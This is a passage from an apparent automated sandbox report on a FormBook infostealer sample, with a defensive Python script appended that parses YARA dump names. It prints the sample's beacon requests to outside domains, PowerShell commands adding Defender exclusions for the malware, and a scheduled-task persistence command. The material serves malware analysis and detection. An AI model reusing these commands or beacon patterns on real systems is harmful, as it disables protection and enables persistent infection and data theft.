                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    1 | 192.168.2.6 | 49757 | 202.254.234.152 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    May 3, 2021 14:53:46.949692011 CEST | 11185 | OUT | GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.premier-moment.info
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:47.265083075 CEST | 11191 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: nginx
                                                                    Date: Mon, 03 May 2021 12:53:47 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 347
                                                                    Connection: close
                                                                    Location: https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&amp;6l=sHbLpdw8x0Nx4">here</a>.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.6 | 49760 | 181.214.142.2 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    May 3, 2021 14:53:52.576576948 CEST | 11193 | OUT | GET /maw9/?AVF=cbTyfQFVyV4qwzSuB5gkHhMhd4ZKxxzMSggVhGr4392xKRAUAYS1aRQvNzIyvi+llhoR0m7eyA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.ecosanhn.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:53:52.709163904 CEST | 11194 | IN | HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Date: Mon, 03 May 2021 12:53:52 GMT
                                                                    Server: LiteSpeed
                                                                    Data Ascii: 2872<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #0000


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    3 | 192.168.2.6 | 49762 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    May 3, 2021 14:54:02.857573986 CEST | 11237 | OUT | GET /maw9/?AVF=ueXSnp9RuZV4VGv1GREwgsKbz6ngTp3QynINalfLY22/qL3buQO/ZY9WhadtjkGC+9EglwJKpA==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.curvygirlholiday.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:02.995352030 CEST | 11238 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Mon, 03 May 2021 12:54:02 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "608f64c6-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    4 | 192.168.2.6 | 49763 | 107.180.57.119 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    May 3, 2021 14:54:13.310914993 CEST | 11240 | OUT | GET /maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx4 HTTP/1.1
                                                                    Host: www.networkingmaderas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    May 3, 2021 14:54:13.470249891 CEST | 11241 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Mon, 03 May 2021 12:54:13 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Accept-Ranges: bytes
                                                                    Vary: Accept-Encoding,User-Agent
                                                                    Content-Length: 1699
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:14:52:19
                                                                    Start date:03/05/2021
                                                                    Path:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0x970000
                                                                    File size:741376 bytes
                                                                    MD5 hash:42662765A94CE5ECE11529509F937711
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:14:52:24
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:24
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
                                                                    Imagebase:0xe0000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:14:52:26
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

Start time: 14:52:27
Start date: 03/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                    General

Start time: 14:52:27
Start date: 03/05/2021
Path: C:\Users\user\Desktop\HAWB AND INV.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\HAWB AND INV.exe
Imagebase: 0x750000
File size: 741376 bytes
MD5 hash: 42662765A94CE5ECE11529509F937711
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                    General

Start time: 14:52:30
Start date: 03/05/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                    General

Start time: 14:53:23
Start date: 03/05/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0xaa0000
File size: 29184 bytes
MD5 hash: B0C7423D02A007461C850CD0DFE09318
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate
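
Each Yara match above cites a memory dump by name, and those names carry the facts an analyst needs to turn a rule hit into an unpacking or injection lead: which process, which region, and what protection the region had. The script below is an added example, not code from the report or from Joe Security, that parses the dump names and groups the hits by process. The field layout is an assumption read off the names on this page: an eight-digit hex process number matching the report's process numbering (0x0A for HAWB AND INV.exe, 0x17 for ipconfig.exe), an eight-digit stage, a decimal dump id, a 16-digit hex region base, an eight-digit hex protection value, and a trailing eight-digit field the page does not explain. The protection decoding rests on the documented Windows memory-protection constants; the two values that appear here, 0x40 and 0x04, are PAGE_EXECUTE_READWRITE and PAGE_READWRITE. The Yara lines in REPORT_YARA_LINES are copied verbatim from the lists above (a subset is enough, since the report repeats each dump once per rule).

```python
"""Parse the dump names cited as Yara sources and group the hits by process.

Added example, not code from the report or from Joe Security. The field layout
is an assumption read off the names on this page; only the protection decoding
rests on documented Windows constants.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows memory protection constants (winnt.h); the low byte holds exactly one of these.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}

# Assumed layout: pid.stage.dumpid.base.protect.tail.sdmp (widths taken from this page).
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<tail>[0-9A-Fa-f]{8})\.sdmp$"
)
# One "• Rule: ..., Description: ..., Source: ..., Author: ..." line as printed in the report.
YARA_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>\S+?),\s*Author:\s*(?P<author>.+)$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    dump_id: int
    base: int
    protect: int
    tail: int  # meaning not documented on the page; kept verbatim

    @property
    def protection_names(self) -> list[str]:
        low = self.protect & 0xFF
        names = [PAGE_PROTECTIONS.get(low, f"0x{low:02x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return names

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* flavour

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE / WRITECOPY, with or without execute


def parse_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    g = m.groupdict()
    return DumpRegion(int(g["pid"], 16), int(g["stage"], 16), int(g["dump_id"]),
                      int(g["base"], 16), int(g["protect"], 16), int(g["tail"], 16))


def summarize(yara_lines: list[str]) -> dict[int, dict[str, set]]:
    """Group hits by process: distinct rules, every region hit, and the RWX subset.

    Several rules firing on one dump collapse to a single region, so the "rwx" set is
    the actual list of writable-and-executable regions worth pulling for unpacking.
    """
    by_pid: dict[int, dict[str, set]] = {}
    for line in yara_lines:
        m = YARA_RE.search(line)
        if not m:
            continue
        region = parse_sdmp(m.group("source"))
        entry = by_pid.setdefault(region.pid, {"rules": set(), "regions": set(), "rwx": set()})
        entry["rules"].add(m.group("rule").strip())
        entry["regions"].add(region.base)
        if region.executable and region.writable:
            entry["rwx"].add(region.base)
    return by_pid


# Verbatim from the Yara-match lists above (subset; the report repeats each dump per rule).
REPORT_YARA_LINES = [
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security",
    "• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Joe Security",
    "• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com",
]

if __name__ == "__main__":
    for pid, info in sorted(summarize(REPORT_YARA_LINES).items()):
        rwx = ", ".join(f"0x{b:x}" for b in sorted(info["rwx"]))
        print(f"process {pid}: rules={sorted(info['rules'])} rwx_regions=[{rwx}]")
```

Read against the process records: every hit in the sample's own process (0x0A) and two of the three in ipconfig.exe (0x17) fall in regions that are both writable and executable, which is the footprint the hollowing and thread-injection signatures in the overview describe. The 0x400000 region in process 0x0A is also not the image base the report records for HAWB AND INV.exe (0x750000), so it is a region the sample created rather than its own loaded image; those RWX dumps, not the on-disk file, are the ones to carve the FormBook configuration from.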
